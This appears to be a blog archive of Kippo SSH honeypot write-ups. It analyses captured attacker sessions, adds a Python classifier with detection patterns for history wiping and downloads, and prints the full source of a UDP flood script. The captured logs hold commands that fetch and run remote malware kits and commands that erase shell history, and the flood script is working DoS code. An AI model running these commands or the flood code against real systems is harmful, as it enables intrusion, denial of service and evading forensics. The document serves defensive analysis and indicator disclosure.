
Tag Archives: kippo

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget qiss.ucoz.com/go.jpg;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.

Files:

1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

a
– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

ssh-scan
– a213ebd69fbc11d612d0374b373f65d8

gen-pass.sh
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

pass-file
– the user:pass permutations from ‘gen-pass.sh’

screen
– cbf0f41bbbafb1c2609bedb943be3b36

go
– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

pscan2
– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

secure
– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

ss
– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

vuln.txt
– contains the results from ‘a’

scam
– gathers system information, saves it to ‘info2’, mails it to mafia89tm@yahoo.com
– given the first three octets of an IP address, executes ‘a’ on each of the 255 addresses within that /24
– periodically, the results are mailed home to amadeoantiq@yahoo.com
– the author has apparently never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

Wall of Shame:

Attack Source: 79.117.232.182
Malware Host: qiss.ucoz.com/go.jpg
Malware Type: portscan / bruteforce
Phones Home: mafia89tm@yahoo.com / amadeoantiq@yahoo.com

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN
-US/W2Ksp3.exe
--2012-10-25 09:30:05--  http://download.microsoft.com/download/win2000platform/
SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history
dev:~#

Seems a little odd that our friend 79.147.238.131 (which appears to be a residential, if dynamically assigned, IP) would go to so much effort covering their tracks only to disconnect the session, but oh well.

I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
15:34:22 up 13 days, 1:55, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 5.13.84.3 15:34 0.00s 0.00s 0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget http://cachefly.cachefly.net/100mb.test
--2012-10-08 15:35:37-- http://cachefly.cachefly.net/100mb.test
Connecting to cachefly.cachefly.net:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget http://root-arhive.clan.su/flood/global/udp.tgz
--2012-10-08 15:36:00-- http://root-arhive.clan.su/flood/global/udp.tgz
Connecting to root-arhive.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
udp.pl
dev:~# chmod +x *
dev:~# perl udp.pl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~#

This looks like a fairly typical attack. In short:

  • The hacker connects from 5.13.84.3 and runs w to see who else is logged in.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads http://cachefly.cachefly.net/100mb.test, presumably to check the speed of the connection.
  • The hacker downloads hxxp://root-arhive.clan.su/flood/global/udp.tgz. Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.
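The sequence above (look around, measure the box, fetch a tool, unpack it, try to run it) is the same shape as the go.jpg one-liner and the history-clearing session earlier on this page, so it is worth being able to pull it out of a Kippo transcript automatically. The script below is an added example and is not part of the original posts or of Kippo itself: it classifies each command typed at the prompt into a stage, splits `;`-chained one-liners into their steps, extracts the URLs fetched and the login source from the `w` table, and applies one decision rule (a download followed by staging or execution). The two transcripts inside it are constructed from command lines shown above, the stage regexes and stage names are my own, and the `dev:~# ` prompt format is assumed to be Kippo's default.

```python
#!/usr/bin/env python3
"""Stage classification and indicator extraction for a captured SSH-honeypot
session. Added example: not code from the original posts or from Kippo; the
transcripts below are constructed from command lines shown in the posts."""
import re

# Constructed from the udp.tgz session and the history-clearing session above.
SESSION_TOOL = """\
dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
dev:~# export HISTFILE=/dev/null
dev:~# cat /proc/cpuinfo
dev:~# wget http://cachefly.cachefly.net/100mb.test
dev:~# wget http://root-arhive.clan.su/flood/global/udp.tgz
dev:~# tar xzvf udp.tgz
dev:~# chmod +x *
dev:~# perl udp.pl 12
dev:~# rm -rf .bash_history
"""

# Constructed from the W2Ksp3.exe session: tracks covered, nothing staged or run.
SESSION_NO_TOOL = """\
dev:~# w
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# export HISTFILE=/dev/null
dev:~# ifconfig
dev:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
dev:~# rm -rf .bash_history
dev:~# touch .bash_history
"""

PROMPT_RE = re.compile(r"^\S+:\S*# (.*)$")   # "dev:~# <command>" (assumed Kippo prompt)
URL_RE = re.compile(r"https?://\S+|(?<=wget )[\w.-]+\.[a-z]{2,}/\S+")  # also bare host/path
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# (stage, pattern) applied to one command; a command may hit several stages.
STAGE_RULES = [
    ("anti-forensics", re.compile(
        r"unset\s+\S*HIST|export\s+HIST(FILE|SIZE)=|rm\s+-rf\s+\.bash_history|history\s+-c")),
    ("recon", re.compile(r"^(w|who|id|uname(\s.*)?|ifconfig|cat\s+/proc/cpuinfo)$")),
    ("bandwidth-test", re.compile(r"\bwget\s+\S*100mb\.test")),
    ("download", re.compile(r"^(wget|curl)\s")),
    ("staging", re.compile(r"^tar\s+x|^chmod\s+\+x")),
    ("execution", re.compile(r"^(perl|python|sh|bash)\s|^\./")),
]


def defang(indicator):
    """Write a URL or IP so it is neither clickable nor resolvable by accident
    (the hxxp:// convention the post uses)."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def split_commands(session_text):
    """Commands typed at the prompt, with ';'-chained one-liners such as
    'wget ...;tar xzvf ...;./go 61' broken into their individual steps."""
    commands = []
    for line in session_text.splitlines():
        m = PROMPT_RE.match(line)
        if m:
            commands.extend(p.strip() for p in m.group(1).split(";") if p.strip())
    return commands


def classify(command):
    return [stage for stage, rx in STAGE_RULES if rx.search(command)]


def analyze(session_text):
    """Per-command timeline, stages in first-seen order, URLs fetched, and
    the login source addresses taken from 'w'/'who' table rows."""
    timeline, stages, urls, sources = [], [], [], []
    for cmd in split_commands(session_text):
        hits = classify(cmd)
        timeline.append((cmd, hits))
        for s in hits:
            if s not in stages:
                stages.append(s)
        for u in URL_RE.findall(cmd):
            if u not in urls:
                urls.append(u)
    for line in session_text.splitlines():
        if re.search(r"\bpts/\d+\b", line):          # a 'w' table row
            for ip in IPV4_RE.findall(line):
                if ip not in sources:
                    sources.append(ip)
    return {"timeline": timeline, "stages": stages, "urls": urls, "sources": sources}


def is_tool_deployment(report):
    """Decision rule: some download is followed, in command order, by staging
    or execution. The udp.tgz and go.jpg sessions satisfy it; the interrupted
    W2Ksp3.exe download does not."""
    tl = report["timeline"]
    first_dl = [i for i, (_, hits) in enumerate(tl) if "download" in hits]
    if not first_dl:
        return False
    return any({"staging", "execution"} & set(hits) for _, hits in tl[first_dl[0] + 1:])


if __name__ == "__main__":
    for name, text in (("udp.tgz session", SESSION_TOOL), ("W2Ksp3 session", SESSION_NO_TOOL)):
        r = analyze(text)
        print(f"{name}: stages={r['stages']} tool_deployment={is_tool_deployment(r)}")
        for u in r["urls"]:
            print("  fetched   ", defang(u))
        for ip in r["sources"]:
            print("  login from", defang(ip))
```

Feeding it a real Kippo `tty` log would first need the replayed session rendered to plain text (Kippo ships a playlog utility for that); the regexes are deliberately narrow so that a `w` in the output table, or the `--2012-10-08 ...` lines wget prints, never count as commands. The decision rule is what you would alert on: an interrupted download with nothing run afterwards is noise, a download followed by `tar x` or a `./` is a tool landing on the box.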

Now we can take a look at udp.pl. How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:

#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";
 exit(1);
}

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

# Flood the given port
packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

# Flood a random port
randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.